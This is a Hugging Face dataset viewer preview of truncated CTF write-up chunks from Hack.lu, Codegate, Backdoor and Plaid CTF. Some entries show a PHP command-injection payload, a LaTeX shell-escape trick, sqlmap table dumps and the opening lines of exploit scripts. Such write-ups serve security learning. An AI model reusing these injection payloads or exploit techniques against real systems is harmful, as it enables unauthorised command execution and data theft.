Dataset Viewer
Auto-converted to Parquet Duplicate
text_chunk
stringlengths
151
703k
Hack.lu 2012 Zombie-lockbox (200) Writeup by cutz ctf@zombie_lockbox:~$ file zombie-lockboxzombie-lockbox: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x85b329ae9ddc0039a4a3a7a0d42ed1098eda09c1, not stripped zombie-lo...
<div id="form"><form method="POST" style=" width:900px; margin:auto;"><label for="name">Name<input type="text" id="name" name ="name"></label><label for="text">Text<textarea name="text" id="text"></textarea></label><label for="solution">Spam protection: 9-system('cat /6f170bcecda1ca8d3a5435591202988881b34bad')-9<input...
Hack.lu 2012 Braincpy (300) Writeup by cutzctf@braincpy:~$ file braincpybraincpy: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.9, not stripped Braincpy was an ELF, according to file 32 bits and statically linked. ctf@braincpy:~$ file braincpybraincpy:...
#!/bin/python # exploit write up - pwnables 200 Defcon 20 CTF# by @_g05u_ NULL Life FTW! import socket, struct #jump to shellcode in stackret = struct.pack("
Misc 200 Task:There are rumors that Lamevich could be a spy.. Check it please, maybe you could find something in the "Very Brown Square"...I used Stegsolv.Open the file "square.gif".Click "<" button twice.So, the flag can be seen.So easy, isn't it?41306ef63420760771deff1a0db76888
Fire up gdb and start snooping around in the binary. To our luck, the ELF still has debugging symbols, so all of the function calls have obvious names.
23 - Spambot The zombies are planning an invasion. But before they can start they want to scare the people by sending scary messages. Because zombies are not able to write letters they've developed a platform which automatically submits messages to guestbooks or comment platforms. A careless zombie lost his note about ...
I reverse engineered the binary to find the encoding function, converted it to Python, and verified correctness. I then wasted a bunch of time making an iterative bruteforcer, until I realized that the encoding function is basically equivalent to: bits('RTFM') + tab[buf[0]] + '00' + tab[buf[1]] + '00' + ... + tab[b...
We were ready to deobfuscate JavaScript, but there wasn't need to do it.We just opened the link in Firefox with Firebug enabled. In the <body> element we saw:<div id="a" data-a="function dafug(){if (prompt("Lets eat some ...?")=="tasty brainz")alert("Flag: tasty_humans_all_day_erry_day"); };"></div>So, we got this flag...
#!/usr/bin/perl# codegate2013 vuln400 exploit# cutz## $ (perl expl_vuln400.pl;cat) | nc 58.229.122.20 6666# _______________________________ # /==============================/ # | Onetime Board Console | # /------------------------------/ # | | WELCOME | | # |__________|_________|_________| # |...
There was no clear goal given in the challenge description text (as guessing was the key skill needed in this CTF), so we decided to just poke around on the website. We immediately got an error message urging us to use a mobile browser. Given the clear affinity of the CTF hosts twoards iPhones, we just changed our User...
\documentclass{article} \begingroup\makeatletter\endlinechar=\m@ne\everyeof{\noexpand}\edef\x{\endgroup\def\noexpand\TeXpath{\@@input"/home/awesker/cure" }}\x \begin{document} {\catcode`_=12 \ttfamily@@\input{|"ls /home/awesker/" } } \TeX{} is \TeXpath\end{document}
# codegate2013 bin100 solution# cutzusing System;using System.Text;using System.Security.Cryptography;namespace test{ class Program { public static string KeyValue = "9e2ea73295c7201c5ccd044477228527"; public static byte[] d = new byte[] { 0x3f, 30, 0x39, 0x2f, 20, 0x4e, 50, 0x36, 0x33, 5, 0x25, 0x29, 0x52, 40,...
<span>In The Name Of GOD;)hi my bro's;)It is very easy</span>:Dq parameters is injectable:Duse sqlmap for inject:D<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables >>dump tables:Dflagsusersdump flags table with command:<< sqlmap.py -u http://backdoor-prob...
Dethstarr was one of my favorite service exploitation challenges during the SecuInside 2012 contest. We had to fully reverse a given binary to understand how the protocol it implements works. To be able to debug the binary easily and in the same environment as on the remote server...
#!/usr/bin/perl# codegate2013 vuln200 exploit# cutz# # perl expl_vuln200.pl 58.229.122.19 7777# [x] exploit successfull# $ id# uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)# $ ls# dump.txt# key# logs# pwn2# $ cat key# Key is "This_is_C0G6ESTYL3!_:)"use strict;use warnings;use IO::Socket;$|++;m...
package main import "crypto/aes"import "fmt"import "encoding/hex" var start = []byte("AES-256 ECB mode twice, two keys")var end = []byte("\x4c\x76\xe9\x07\x86\xc4\xf3\x64\x6a\xdf\x99\x21\x7a\x64\xd0\xd7\x49\xed\xc5\x9f\x2c\x7f\xbb\x36\x58\xaf\x04\xaf\x07\x1d\x0c\x47") var reverse = make(map[string][32]byte) func main()...
~~~THE TASK~~~ Zombies got communication-problems because of their heterogeneity, so they defined a standard for their communication. We need to know how to decrypt their messages in order to successfully defeat them. Luckily, a friend of mine found one of those encrypted messages: 0x1be15dc 77676058612 03062372 676 0...
#!/usr/bin/python from z3 import * data = [ord(c) for c in "".join(["\x00\x3F\x60\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F","\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C","\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A","\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x...
#!/usr/bin/env python2## see: https://github.com/fx5/not_random and related article import sysimport osimport gzipimport randomfrom itertools import imapimport hashlib from lxml.etree import parse from progress import ProgressBar #HOST = 'example.com'HOST = 'ctf.phdays.com:12391'USERN = int(sys.argv[1])EMAIL = 'user%[e...
In The Name Of GOD;)hi my bro's;)<span>It is very easyDifference is that the web 150 is just the type of inject;)blind</span> injection:Puse sqlmap for inject:)<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web500/submit.php --data id=1 -p id --threads 10 --sql-query="select password from users where name='...
The trick here was to spot the vulnerability. The scripts loads html from a controlled webpage with @file_get_contents(). It then parses the html for forms with regex to solves a basic math problem, with unescaped eval(). Finally the page submits a post request to the controlled webpage with file_get_contents().
# Rookie Agent ## The Given We have intercepted this encrypted message. Since the agent who has sent it, is not a pro, we believe decrypting it would be easy. Good luck! 6di16 ovhtm nzsls xqcjo 8fkdm tyrbn g4bg9 pwu9g lefmr k4bg9 ahmfm tyr4b g9htm 7ejcn zsbng 492cj olsxq 9glef mrk4b g9ahm fmtyr lsxq7 ejccj...
# Cryptor ## The GivenWe have found the cryptor source code. Decrypt the file. ```c++#include <stdio.h>#include <stdlib.h>#include <string.h>#include <time.h> using namespace std;int bitXor(int, int); int main(int argc, char **argv){ srand(time(NULL)); char *path=new char[30]; if(argc > 1) path = argv[1...
# Windows ## The GivenAppend what you find to "ASIS\_" and send that as flag. An [mp4 video](windows_assets/windows.mp4) is attached. It's a video of smallpictures of windows flashing across the screen with a strange soundtrack. ![Example Frame](windows_assets/windows.png) ## AnalysisLet's start with the audio. Pull ou...
# PCap ## Given We're given a pcap file. [The pcap file](pcap.pcap). ## Observations There were two ip addresses communicating with each other: * 172.16.133.133* 172.16.133.149 ## TCP Conversations There was some substantial cover traffic, but in the end, we identifiedjust three categories of communication that were re...
#include <stdlib.h>#include <stdio.h>#include <limits.h> unsigned int outputs[7][4] = { {0x7358837a, 0x6e1b2658, 0x3c00c5ff, 0x8c0d4aa}, {0x34d8c3b5, 0x5b56dca1, 0x78236d7, 0x1973085e}, {0x1f49456c, 0x27c0fa1d, 0x145214aa, 0x6200299c}, {0x1fea6614, 0x41cdb864, 0x53c0ed56, 0x63642916}, {0x4e81abc7, 0x792ce075, 0x7d2bc...
In this task we are given anInnoSteup file, setup.exe. The setup.exe contained a long eula, and a passwordrequirement to install the program. Bypassing the password could be done withollydbg or just a simple innosetup unpacker. Unpacking the setup we see a C programwhich prints to screen that we already saw the flag. W...
This is a reference to DEFCON 2006’s trivia question whichused EBFE is to x86 as ____ is to PowerPC. This time we have to find the ARM64equivalent.<span>A quickgoogle search tells us that EBFE is a jmp instruction, but ARM does not havesuch instruction, they use branches instead, b is our instruction. Looking inthe ARM...
<span>Flag is out there: http://[2a02:6b8:0:141f:fea9:d5ff:fed5:XX01]/</span>Flag format: CTF{..32 hexes..} <span>So we know we are given an IPv6 address missing two characters, hence XX. Thankfullywe can search for the address in an ipv6 database which tells us that there isa website with an ipv6 address of http://[2a...
---- Writeup ----CTF: BACKDOOR 2014Problem: binary-10Author: Dr.OptixAll rights reserved.-----------------I will start with basic recon.$ file bin10 bin10: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=e0f10986e9a0fc976ff2be10b411f368bfd5...
---- Writeup ----CTF: BACKDOOR 2014Problem: web-50Author: Dr.OptixAll rights reserved.NOTE: Another solution proof made directly from the notes I took while solving-----------------This problem starts at:http://backdoor.cognizance.org.in/problems/web50/search.phpAt the first look it seems to be a SQL injection problem....
First Many Time Pad then Caesar cipherFor checking your solutions:Keystream8cbceac3c9359047eafb6eca7503e26bd603a435c762f975ce3be5ba678c58ed<span>2fb4f9ff61ec46537c71f13046df1180a784d005d358f69fa9842443df1c4c4173d175973c5d07970a1ead0c6de587c38b5be127775bfa2f4c4cb42652975829fb499973256cfa29937458514cf2f553d7b947b9f15d282...
<span>Google "Elton Badget", first result is LinkedIn: http://ru.linkedin.com/pub/elton-badget/93/aa/42Read the initials of his "also knows about" section: Firewalls, Logistics Management, Apache, Graphic Design, IT Management, Servers, Database Design, IT Outsourcing, Computer Security, Technical Writing, ISO, 0-in, N...
First visit his Facebook page, he has this comment: "<span>Do u know about twitch.tv? Sometimes streaming there, look at me!"The about page writes: "</span>Screen Name: pipissimo (Other Service)"So you can find his twitch profile: http://www.twitch.tv/pipissimoIn one of his previous videos (the only one with a comment)...
Question: Hack the Planet_The answer to this is “!”. It is based off of a running gag from DEFCON where eachyear they use the same question, but blank out a different character/word. If you didn't know this you could just google the phrase "Hack the Planet".
# Plaid CTF 2014: mtpox **Category:** Web**Points:** 150**Description:** > The Plague has traveled back in time to create a cryptocurrency before Satoshi does in an attempt to quickly gain the resources required for his empire. As you step out of your time machine, you learn [his exchange](http://54.211.6.40/) has stop...
End of preview. Expand in Data Studio
README.md exists but content is empty.
Downloads last month
33